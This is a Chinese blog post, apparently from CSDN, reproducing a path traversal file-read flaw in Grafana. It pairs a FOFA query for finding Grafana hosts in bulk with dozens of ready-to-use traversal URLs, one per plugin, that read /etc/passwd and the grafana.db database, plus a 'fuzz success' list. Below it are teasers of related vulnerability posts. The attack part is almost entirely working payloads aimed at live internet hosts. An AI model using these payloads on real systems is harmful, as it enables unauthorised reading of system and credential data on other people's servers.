Grafana 未授权任意文件读取漏洞复现

最新推荐文章于 2024-05-16 11:57:51 发布
最新推荐文章于 2024-05-16 11:57:51 发布
阅读量5.3k 收藏 2
点赞数 1
分类专栏: web渗透 漏洞复现 文章标签: 安全
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/m0_64910183/article/details/121970470
版权

1.fofa 批量搜索

app="Grafana"

漏洞URL:

{{BaseURL}}/public/plugins/{{plugin-id}}/../../../../../../../../../../../../../../../../../../../etc/passwd

2.获取远程目标linux系统的/etc/passwd密码信息

/public/plugins/alertGroups/../../../../../../../../etc/passwd/public/plugins/alertlist/../../../../../../../../etc/passwd
/public/plugins/alertmanager/../../../../../../../../etc/passwd
/public/plugins/annolist/../../../../../../../../etc/passwd
/public/plugins/barchart/../../../../../../../../etc/passwd
/public/plugins/bargauge/../../../../../../../../etc/passwd
/public/plugins/canvas/../../../../../../../../etc/passwd
/public/plugins/cloudwatch/../../../../../../../../etc/passwd
/public/plugins/dashboard/../../../../../../../../etc/passwd
/public/plugins/dashlist/../../../../../../../../etc/passwd
/public/plugins/debug/../../../../../../../../etc/passwd
/public/plugins/elasticsearch/../../../../../../../../etc/passwd
/public/plugins/gauge/../../../../../../../../etc/passwd
/public/plugins/geomap/../../../../../../../../etc/passwd
/public/plugins/gettingstarted/../../../../../../../../etc/passwd
/public/plugins/grafana-azure-monitor-datasource/../../../../../../../../etc/passwd
/public/plugins/grafana/../../../../../../../../etc/passwd
/public/plugins/graph/../../../../../../../../etc/passwd
/public/plugins/graphite/../../../../../../../../etc/passwd
/public/plugins/heatmap/../../../../../../../../etc/passwd
/public/plugins/histogram/../../../../../../../../etc/passwd
/public/plugins/influxdb/../../../../../../../../etc/passwd
/public/plugins/jaeger/../../../../../../../../etc/passwd
/public/plugins/live/../../../../../../../../etc/passwd
/public/plugins/logs/../../../../../../../../etc/passwd
/public/plugins/loki/../../../../../../../../etc/passwd
/public/plugins/mixed/../../../../../../../../etc/passwd
/public/plugins/mssql/../../../../../../../../etc/passwd
/public/plugins/mysql/../../../../../../../../etc/passwd
/public/plugins/news/../../../../../../../../etc/passwd
/public/plugins/nodeGraph/../../../../../../../../etc/passwd
/public/plugins/opentsdb/../../../../../../../../etc/passwd
/public/plugins/piechart/../../../../../../../../etc/passwd
/public/plugins/pluginlist/../../../../../../../../etc/passwd
/public/plugins/postgres/../../../../../../../../etc/passwd
/public/plugins/prometheus/../../../../../../../../etc/passwd
/public/plugins/stat/../../../../../../../../etc/passwd
/public/plugins/state-timeline/../../../../../../../../etc/passwd
/public/plugins/status-history/../../../../../../../../etc/passwd
/public/plugins/table-old/../../../../../../../../etc/passwd
/public/plugins/table/../../../../../../../../etc/passwd
/public/plugins/tempo/../../../../../../../../etc/passwd
/public/plugins/testdata/../../../../../../../../etc/passwd
/public/plugins/text/../../../../../../../../etc/passwd
/public/plugins/timeseries/../../../../../../../../etc/passwd
/public/plugins/welcome/../../../../../../../../etc/passwd
/public/plugins/xychart/../../../../../../../../etc/passwd
/public/plugins/zipkin/../../../../../../../../etc/passwd

 

3.常用的插件列表
 

http://x.x.x.x:3000/api/plugins?embedded=0
 

alertlist
annolist
grafana-azure-monitor-datasource
barchart
bargauge
cloudwatch
dashlist
elasticsearch
gauge
geomap
gettingstarted
stackdriver
graph
graphite
heatmap
histogram
influxdb
jaeger
logs
loki
mssql
mysql
news
nodeGraph
opentsdb
piechart
pluginlist
postgres
prometheus
stat
state-timeline
status-history
table
table-old
tempo
testdata
text
timeseries
welcome
zipkin

 

image
 

 

 

 

4.远程读取数据库信息
 

/public/plugins/welcome/../../../../../../../../var/lib/grafana/grafana.db
 

 

 

4.Fuzz Success
 

/public/plugins/alertGroups/../../../../../../../../etc/passwd /public/plugins/alertlist/../../../../../../../../etc/passwd /public/plugins/annolist/../../../../../../../../etc/passwd /public/plugins/barchart/../../../../../../../../etc/passwd /public/plugins/bargauge/../../../../../../../../etc/passwd /public/plugins/canvas/../../../../../../../../etc/passwd /public/plugins/dashlist/../../../../../../../../etc/passwd /public/plugins/debug/../../../../../../../../etc/passwd /public/plugins/gauge/../../../../../../../../etc/passwd /public/plugins/geomap/../../../../../../../../etc/passwd /public/plugins/gettingstarted/../../../../../../../../etc/passwd /public/plugins/graph/../../../../../../../../etc/passwd /public/plugins/heatmap/../../../../../../../../etc/passwd /public/plugins/histogram/../../../../../../../../etc/passwd /public/plugins/live/../../../../../../../../etc/passwd /public/plugins/logs/../../../../../../../../etc/passwd /public/plugins/news/../../../../../../../../etc/passwd /public/plugins/nodeGraph/../../../../../../../../etc/passwd /public/plugins/piechart/../../../../../../../../etc/passwd /public/plugins/pluginlist/../../../../../../../../etc/passwd /public/plugins/stat/../../../../../../../../etc/passwd /public/plugins/state-timeline/../../../../../../../../etc/passwd /public/plugins/status-history/../../../../../../../../etc/passwd /public/plugins/table/../../../../../../../../etc/passwd /public/plugins/table-old/../../../../../../../../etc/passwd /public/plugins/text/../../../../../../../../etc/passwd /public/plugins/timeseries/../../../../../../../../etc/passwd /public/plugins/welcome/../../../../../../../../etc/passwd /public/plugins/xychart/../../../../../../../../etc/passwd

                

        

        

    




    

      

        

            

              
                
                  渗透测试中心
                
              
            

            

                关注
              
            

        

        

          
    
            
  • 
              
                
                
                
                
                    1
                
              
              
    点赞
    
            
    • 
            
  • 
              
                
                
                
              
              
    
            
    • 
            
  • 
              
                
                
                
                
                    2
                
              
              
    
                
    
                  
                    收藏
                  
                
    
              
    
              
    
                
    
                  觉得还不错?
                  
                    一键收藏
                  
                 
                
    
              
    
            
    • 
                
  • 
                  
                    打赏
                    
                  
                  
    打赏
    
                
    • 
          
  • 
            
    
              
              
            
    
              
              
              
                    0
              
            
            
    评论
    
          
    • 
          
  • 
          
    • 
          
  • 
            
              
            
              
    
            
              
                
            
    
          
    • 
        

      

      

            

                专栏目录
          










                



	

		

			

				
					
Grafana 授权任意文件读取漏洞复现(CVE-2021-43798 )

				
			

			

				

					千寻的博客
				

				

					12-16
					
					3424
					
				

			

		

		

			
				
文章目录漏洞名称漏洞编号漏洞描述影响版本fofa漏洞复现步骤修复建议参考链接免责声明
漏洞名称

Grafana 授权任意文件读取

漏洞编号

CVE-2021-43798

漏洞描述


Grafana是一个跨平台、开源的数据可视化网络应用程序平台,用户配置连接的数据源之后,Grafana可以在网络浏览器里显示数据图表和警告。


Grafana 存在授权任意文件读取漏洞,攻击者在经身份验证的情况下可通过该漏洞读取主机上的任意文件。


影响版本

Grafana 8.x

fofa
app

			
		

	



                

              
                



	

		

			

				
					
漏洞复现Grafana任意文件读取漏洞(CVE-2021-43798)_grafana漏洞复现

				
			

			

				

					2401_84437170的博客
				

				

					04-17
					
					623
					
				

			

		

		

			
				
Grafana是一个跨平台、开源的数据可视化网络应用程序平台。用户配置连接的数据源之后,Grafana可以在网络浏览器里显示数据图表和警告。

			
		

	



                


  
              

                


	

		

			

				
					
漏洞分析|CVE-2021-43798 - Grafana文件读取漏洞

				
			

			

				

					weixin_42508548的博客
				

				

					12-21
					
					2811
					
				

			

		

		

			
				
下午的时候,群里突然看到这样一条信息......



貌似是某个0day漏洞被公开了。。。因为前几天刚分析完泛微的漏洞,发现在分析过程中会发现一些有趣的东西,所以这里也尝试进行了分析。当然,在分析之前,还是先自己打一遍,熟悉一下。

0x02 环境搭建&漏洞复现

1、一开始其实我是不知道Grafana是什么的,也如群里师傅说的那样,让我猜,emm...,然后就是万能百度了



2、大概理解了一下,Grafana是一个完全开源的度量分析与可视化平台,可对来自各种各种数据源的数据进行查询、分

			
		

	





	

		

			

				
					
CVE-2021-43798——Grafana 授权任意文件读取_grafana授权访问(1)

					
最新发布

				
			

			

				

					2301_82241775的博客
				

				

					05-16
					
					248
					
				

			

		

		

			
				
Python编程学习,学习内容包含:语法、正则、文件、 网络、多线程等常用库,推荐《Python核心编程》,不要看完;在实际的渗透测试过程中,面对复杂多变的网络环境,当常用工具不能满足实际需求的时候,往往需要对现有工具进行扩展,或者编写符合我们要求的工具、自动化脚本,这个时候就需要具备一定的编程能力。恭喜你,如果学到这里,你基本可以从事一份网络安全相关的工作,比如渗透测试、Web 渗透、安全服务、安全分析等岗位;③漏洞扫描、漏洞利用、原理,利用方法、工具(MSF)、绕过IDS和反病毒侦察。

			
		

	



		

			
		



	

		

			

				
					
Grafana 授权任意文件读取 0day 漏洞复现

				
			

			

				

					yoyo_573的博客
				

				

					12-21
					
					2926
					
				

			

		

		

			
				
Grafana 授权任意文件读取 0day 漏洞

			
		

	





	

		

			

				
					
Grafana 任意文件读取漏洞复现分析

				
			

			

				

					weixin_45794666的博客
				

				

					03-02
					
					2894
					
				

			

		

		

			
				
Grafana 任意文件读取漏洞复现分析
CVE-2021-43798
0x01 前言
概述
Grafana是一个跨平台、开源的数据可视化网络应用程序平台。用户配置连接的数据源之后,Grafana可以在网络浏览器里显示数据图表和警告。
影响范围
Grafana 8.0.0-beta1 - 8.3.0

安全版本
Grafana >= 8.3.1  
Grafana >= 8.2.7  
Grafana >= 8.1.8  
Grafana >= 8.0.7

0x02 环境搭建
do

			
		

	





	

		

			

				
					
授权访问漏洞总结

				
			

			

				

					LuckySec
				

				

					03-24
					
					4714
					
				

			

		

		

			
				
前言:这篇文章主要收集一些常见的授权访问漏洞授权访问漏洞可以理解为需要安全配置或权限认证的地址、授权页面存在缺陷导致其他用户可以直接访问从而引发重要权限可被操作、数据库或网站目录等敏感信息泄露。
0x01 授权漏洞预览
Active MQ 授权访问
Atlassian Crowd 授权访问
CouchDB 授权访问
Docker 授权访问
Dubbo 授权访问
Druid 授权访问
Elasticsearch 授权访问
FTP 授权访问
Hadoop 授权访问
JBoss 授权访

			
		

	





	

		

			

				
					
Grafana任意文件读取漏洞(CVE-2021-43798)

				
			

			

				

					qq_50854662的博客
				

				

					06-27
					
					994
					
				

			

		

		

			
				
Grafana任意文件读取漏洞

			
		

	





	

		

			

				
					
漏洞复现Grafana任意文件读取漏洞(CVE-2021-43798)

					
热门推荐

				
			

			

				

					qq_45244158的博客
				

				

					12-09
					
					1万+
					
				

			

		

		

			
				
Grafana 任意文件读取漏洞复现(CVE-2021-43798)

			
		

	





	

		

			

				
					
授权访问漏洞-Redis授权访问漏洞

				
			

			

				

					HAKUNAMATATATTA的博客
				

				

					11-29
					
					3286
					
				

			

		

		

			
				
授权访问漏洞可以理解为需要安全配置或权限认证的地址、授权页面配置不当导 致其他用户可以无需认证授权直接访问从而引发重要权限可被操作、数据库或网站目录等敏感信息泄露。Redis 是完全开源免费的,一个灵活的高性能 key-value 数据结构存储,可以用来作为数据库、缓存和消息队列。

			
		

	





	

		

			

				
					
CVE-2021-43798 Grafana 文件读取漏洞

				
			

			

				

					2301_79724395的博客
				

				

					04-16
					
					798
					
				

			

		

		

			
				
影响版本 Grafana 8.0.0-beta1 to 8.3.0攻击者可以通过将包含特殊目录遍历字符序列(…/)的特制HTTP请求发送到受影响的设备来利用此漏洞。成功利用该漏洞的攻击者可以在目标设备上查看文件系统上的的任意文件

			
		

	





	

		

			

				
					
泛微OA xmlrpcServlet接口任意文件读取漏洞(CNVD-2022-43245)

				
			

			

				

					12-25
				

			

		

		

			
				
泛微OA xmlrpcServlet接口任意文件读取漏洞(CNVD-2022-43245),可以指定文件路径进行读取,并提供检测方案

			
		

	





	

		

			

				
					
Adminer≤4.6.2任意文件读取漏洞1

				
			

			

				

					08-03
				

			

		

		

			
				
Adminer≤4.6.2 任意读取漏洞0x01 前SQLite、PostgreSQL 等众多主流数据库,类似于 phpMyAdmin 的 MySQL 管理客

			
		

	





	

		

			

				
					
jQuery-1.7.2任意文件读取漏洞验证利用脚本

				
			

			

				

					04-27
				

			

		

		

			
				
jQuery是一个快速、简洁的JavaScript框架,丰富的Javascript代码库,在其1.7.2版本的sys_dia_data_down模块存在任意文件读取漏洞,攻击者可通过前台读取任意文件

			
		

	





	

		

			

				
					
nc57-任意文件读取漏洞补丁

				
			

			

				

					06-08
				

			

		

		

			
				
nc57_任意文件读取漏洞补丁

			
		

	





	

		

			

				
					
常见授权访问漏洞总结

				
			

			

				

					weixin_50464560的博客
				

				

					10-02
					
					2258
					
				

			

		

		

			
				
本文仅限技术研究与讨论,严禁用于非法用途,否则产生的一切后果自行承担。
常见的授权访问漏洞:

Redis 授权访问漏洞
MongoDB 授权访问漏洞
Jenkins 授权访问漏洞
Memcached 授权访问漏洞
JBOSS 授权访问漏洞
VNC 授权访问漏洞
Docker 授权访问漏洞
ZooKeeper 授权访问漏洞
Rsync 授权访问漏洞
Atlassian Crowd 授权访问漏洞
CouchDB 授权访问漏洞
Elasticsearch...

			
		

	





	

		

			

				
					
【CTF】Grafana目录遍历漏洞寻找flag

				
			

			

				

					qq_48201589的博客
				

				

					06-20
					
					1537
					
				

			

		

		

			
				
这个CMS的漏洞大家都应该知道,网上也能搜得到,常规的一个Linux目录遍历,但如何寻找flag,确实是一件令人头疼的事情。话不多说,开整老样子,正常的抓包,利用目录遍历漏洞这里有一个大家可能都不会去关注的用户,而这个用户就是flag的突破口。 查看该用户的历史命令,成功找到了flag 这波,你学废了吗?...

			
		

	





	

		

			

				
					
shopxo download 任意文件读取漏洞

				
			

			

				

					09-02
				

			

		

		

			
				
shopxo是一种流行的开源电商系统,以其简单易用和灵活性而备受欢迎。然而,它也存在一些安全漏洞,包括任意文件读取漏洞。这个漏洞可能会使攻击者能够读取服务器上的任意文件,包括敏感的配置文件和用户数据。

要利用shopxo download任意文件读取漏洞,攻击者通常会构造特定的URL请求,注入恶意代码来访问目标文件。攻击者可能可以通过执行一系列步骤来实现此目标,例如:

1. 识别目标系统上潜在的敏感文件,如数据库配置文件、用户身份验证文件等。
2. 构造特定的URL来请求这些文件,使用目标系统的下载功能。
3. 在URL中注入特殊字符或路径遍历符号,以绕过访问限制和读取目标文件。

一旦攻击者成功读取到目标文件,他们可能会进一步利用这些信息来实施其他攻击,例如窃取用户信息、篡改网站内容或者进行其他恶意活动。

为了防范shopxo download任意文件读取漏洞,网站管理员可以采取以下措施:

1. 及时更新shopxo系统以修复任何已知漏洞,并安装最新的补丁程序。
2. 限制对敏感文件的访问权限,确保只有授权的用户能够访问它们。
3. 验证和过滤用户输入,以防止任意文件读取漏洞的利用。
4. 实施Web应用程序防火墙(WAF),以监视和阻止恶意请求。
5. 定期进行安全审计和漏洞扫描,以及对服务器和应用程序配置进行安全性评估。

通过采取这些预防措施,可以最大限度地减少shopxo download任意文件读取漏洞的风险,并确保网站和用户数据的安全性。

			
		

	



              



  
“相关推荐”对你有帮助么?

  

      
    
          
  • 
              
    
                  
                  
              
    
              
    非常没帮助
    
          
    • 
          
  • 
              
    
                  
                  
              
    
              
    没帮助
    
          
    • 
          
  • 
              
    
                  
                  
              
    
              
    一般
    
          
    • 
          
  • 
              
    
                  
                  
              
    
              
    有帮助
    
          
    • 
          
  • 
              
    
                  
                  
              
    
              
    非常有帮助
    
          
    • 
      

      

      

          
          提交
      

      

  




          




        



    





    



      

      

        
      

      





	

		评论	
	

	
	




  

    

      添加红包
      
    

    

      

        
        

          
          
        

        
请填写红包祝福语或标题

      

      

        
        

          
          
        

        
红包个数最小为10个

      

      

        
        

          
          
        

        
红包金额最低5元

      

      

        
        

          当前余额3.43前往充值 >
        

      

      

        

          需支付:10.00

        
        
      

    

  





  

    
    
  

  

    
    
  








  

    

      

        

          

            
            
成就一亿技术人!

          

          

        

        

          

          

            领取后你会自动成为博主和红包主的粉丝
            规则
          

        

      

      

        

          

            
              
            
            

              
hope_wisdom
 发出的红包
            

          

        

        

          

          

          

        

      

    

    

  





	
打赏作者

	

		

		
			
		
		

		

			
渗透测试中心

			
各位师傅,觉得文章不错可支持下

		

	

	

			

	

	

    ¥1
    ¥2
    ¥4
    ¥6
    ¥10
    ¥20
	

	

		

			

				

					扫码支付:¥1
				

				

					

					
					获取中
					

				

				

					
					
					扫码支付
				

			

		

		

			
您的余额不足,请更换扫码支付或充值

			
打赏作者

		

	



      
      

      
实付

      
使用余额支付

      

        

          

            
            点击重新获取
          

        

        
扫码支付

      

      

        
          
            
          
          
        
      

      

        
        钱包余额
          0
          

            
            

              

                
抵扣说明:

                
 1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
 2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

              

            

          

      

      余额充值